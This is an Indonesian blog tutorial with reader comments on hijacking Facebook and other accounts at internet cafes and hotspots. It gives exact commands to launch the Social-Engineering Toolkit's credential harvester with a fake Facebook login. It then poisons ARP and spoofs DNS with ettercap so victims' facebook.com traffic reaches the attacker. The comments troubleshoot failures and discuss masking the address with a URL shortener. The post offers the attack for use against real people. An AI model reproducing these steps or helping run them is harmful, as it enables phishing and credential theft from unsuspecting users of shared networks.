Browse » Home
» Katanya Hacking
» Hack Account Facebook , Twitter , Gmail dll With Social-Engineering Toolkit + Video ~ Backtrack

Bagaimana Fucklentine kemarin??? Semoga aja agan tidak latah ikut²an orang kampungan merayakannya...
nih hadiah dari saya buat yang merayakan http://dearbrands.com/ hehehe...
kali ini saya akan share tentang SET atau Social-Engineering Toolkit beserta Videonya ( dibawah )..
SET ini sudah tersedia di Backtrack 5 ...
ini sejenis fake login yang alamatnya adalah ip address kita...
jadi kebelet pngen ke warnet / hotspot hahaha..
oke mulai ....
Pertama buka terminal..
1. cd /pentest/exploits/set (enter)
2. ./set (enter)
3. pilih Social-Engineering Attacks dengan cara tekan angka 1
4. pilih Website Attack Vectors tekan 2
5. pilih Credential Harvester Attack Method tekan 3
6. pilih Web Templates tekan 1
jika memilih Site Cloner kita perlu memasukan alamat web yang akan kita buat menjadi fake login, dan jika web templates kita tinggal memilih yang sudah disediakan oleh SET itu sendiri, facebook contohnya...
7. tinggal pilih template yg mana, untuk contoh kita coba facebook, pilih 4
8. Press {return} to continue. tekan enter..
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
berarti SET sudah selesai....etss jangan di close.. :p nanti passwordnya muncul di bawah itu..
Bagaimana SET akan bekerja ? jika korban memubuka alamat http://ipadresskita atau http://192.168.0.3 misalnya maka tampilannya akan seperti facebook, dan ketika korban login , akan terkirim ussername and password ke terminal kita...( untuk melihat ip address , lakukan perintah ifconfig pada terminal)
Tapi sangat tipis kemungkinan korban mengakses http://192.168.0.3 , lalu bagaimana agar korban dapat membuka http://192.168.0.3 / ip address kita ?? lakukan saja DNS SPOOFING...
oke kita buat agar setiap korban mengakses http://www.facebook.com akan beralih ke http://192.168.0.3.
korban tidak akan curiga karena url tetap www.facebook.com dan tampilannya pun sama persis...
1. buka etter dns dengan perintah gedit /usr/local/share/ettercap/etter.dns
2. edit menjadi :
facebook.com A 192.168.0.3
*.facebook.com A 192.168.0.3
192.168.0.3 itu contoh ip saya...
setelah itu save..
3. jalankan dns spoofing dengan perintah
ettercap -Tqi (interfaces) -P dns_spoof -M ARP // //
interfaces saya eth0 ( lihat di ifconfig ) jadi perintahnya seperti ini :
ettercap -Tqi eth0 -P dns_spoof -M ARP // //
setelah itu , kita buka terminal yang pertama (SET)
kita tunggu sampai korban login..nanti akan ada email dan password , silahkan gunakan dengan bijak :p
jika kurang mengerti lihat Video saya :
fullscreen jika kurang jelas...
selamat mencoba :D
Langganan:
Posting Komentar (Atom)



46 komentar:
Dicoba dulu..
gan gimana cara nya nih buat buka terminal gak ngerti eng..
heheheh,...
farid : silahkan gan,,,
roni : terminal itu semacam CMD jika di windows..tapi ini d backtrack...silahkan install os linux backtracknya pasti tau,,ini bkn windows tp linux-backtrack :)
Good job.
thanks for tutorial :c:
sama2 gan :b:
tapi klo di coba ke seven blom bisa bro :i: klo xp bisa :)
saya belum coba d seven gan :D
kalo agan dah coba emg ga bisa mungkin ada cara lain...pokonya tetep semgangat :e:
gan ane udah coba tp dns spoofnya kayanya ga kerja ane uda coba ke semua kom di rumah... kalo coba langsung browse ke ip : 192.168.1.3 emang keluar tampilan facebook... tp kalo buka www.facebook.com tetep ke situs aslinya...
output ettercap saya :
ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> "sensor" 192.168.1.3 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
1 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
kenapa yah gan kira2?
itu dns spoofingnya emg dah kerja.. cb d liat d etter.dns nya *.facebook.com A ipagan udah d ketik?? kalo udah, dan d www.facebook.com ga bekerja kemungkinan karena historynya...coba d cek kalo misalkan history d browser korban d bersihin terus masukin www.facebook.com berpengaruh atau ngga... :)
mantap gan..ijin belajar ya?..sangat Bermanfaat..Trimakasih Gan
@anonim : sama2 agan :) , semoga bermanfaat..
thanks infonya sob..:)
sama2 agan :)
gan... kalo kaya gini gimana
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache?
[*] Try disabling Apache and try SET again.
[*] Printing error: [Errno 98] Address already in use
[*] Exiting the Social-Engineer Toolkit (SET)... Hack the Gibson.
maaf gan baru bka blog..
itu mungkin karena agan sedang menjalankan apache..
coba disable/stop apachenya..
jalankan perintah /etc/init.d/apache2 stop
setelah itu coba jalankan SET lagi.. :D
Semacam Keylogger ya om ??
ky phising.. :D
tapi alamat yg d aksesnya itu IP kita..cz Backtrack kan ada Apache jd ga perlu daftar hostingan kl buat ky gini..
@gan akhir, sy cb jawab setau saya...
biasanya etter.dns letaknya di
/usr/share/ettercap/etter.dns atau
/usr/local/share/ettercap/etter.dns..agan udah coba d cek dulu? biasanya kalo d locate memang suka ga ada...cek aja nano /usr/share...dst..
kalo ada isinya berarti itu filenya,
di hapus semua jg gpp tulisannya,isi sama perintah spoofing yg kita mau..coba aja dl gan..
kalo emang ga ada jalan lain, instal yg baru aja..tar sy kasih caranya... :)
[!] Sorry. Metasploit was not found. This feature does not work properly without Metasploit.
Press {return} to go back to the main menu.
kenapa ini bro??
cb ketik msfconsole ada metasploitnya ga?
asik bray.. :D saya kutip ttg FB-autolikenya
Keep share :D
silahkan gan :)
terimakasih kunjungannya...
bang, teknik seperti ini cuma bisa dilakuin di jaringan LAN sama wifi ya ? atau gimana ?? sorry nih newbie
gan gmna lok fbx di luar jaringan. g pada 1 jaringan??
ya paling pake phising..soalnya skrg blm ada lg cara..
gan pentest/expolits/set/ cd - fungsix apa
kok px ku kagak bs
cd /pentest/exploits/set itu buat ke direktori set yang ada di dir exploit yg ada di dir pentest..
pastikan pengetikannya benar
gag ngerti gan
ya belajar
gan cara ini,,berfungsi hanya dalam satu jaringan LAN ato gmna??
iya satu jaringan :)
keep shared
terimakasih :)
gan dns spoofnya gk runing nih knepa ya ? padahal saya udah lakuin seperti yg agan lakukan, tp gk bisa bisa history juga udah di hapus semua
Solusi gan ^^
"Knowledge is free"
"We are Legion"
"Respect us"
"Expect us"
gak running gmn? coba copas outputnya kesini..
gan, mw nya nih pemula bgt soalny, buat tahu interfacesnya kan kita ke ifconfig dulu, itu kita prlu setting IP di network interfacesny ga?
tanya lg gan, kalo backtracknya di vmware, yg di setting apa aja y gan klo sy pk w7 yg jd targetny nya? :)
@nurcahya : kalo udah konek ga usah d setting lagi..tinggal liat aja di ifconfig, terus coba ping ip target jika ada reply berarti sudah terkoneksi jika tidak konek cek firewall target coba offkan dl lalu ping lagi, jika sudah ada reply silahkan exploitasi..semoga berhasil :)
gan...pas masukin ip address ke tiny url..ko waktu dijalanin problem loading page y gan...knp kira"?rimakasih
kalo ga ke tinyurl gmn?? sukses ga ?
mantap bro,,,,,
sekali coba langsung duoooooooor ,,,,,
i love backtrack :D
bro kalo pake koneksi modem usb gmn bro interface , ?? apakah sama mas bro
kalo ip modemnya private ga bisa menurut saya..kl public blm coba..
lanjutkan . sip :)
Activating dns_spoof plugin...
SEND L3 ERROR: 1652 byte packet (0800:06) destined to 192.168.66.108 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1898 byte packet (0800:06) destined to 192.168.66.108 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1688 byte packet (0800:06) destined to 192.168.66.108 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1645 byte packet (0800:06) destined to 192.168.66.102 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1504 byte packet (0800:06) destined to 192.168.66.102 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
kalo seperti ini apa yg salah gan?
:~/sslstrip-0.9# echo ’1′ > /proc/sys/net/ipv4/ip_forward
bash: echo: write error: Invalid argument
kok punya w gini ea
Posting Komentar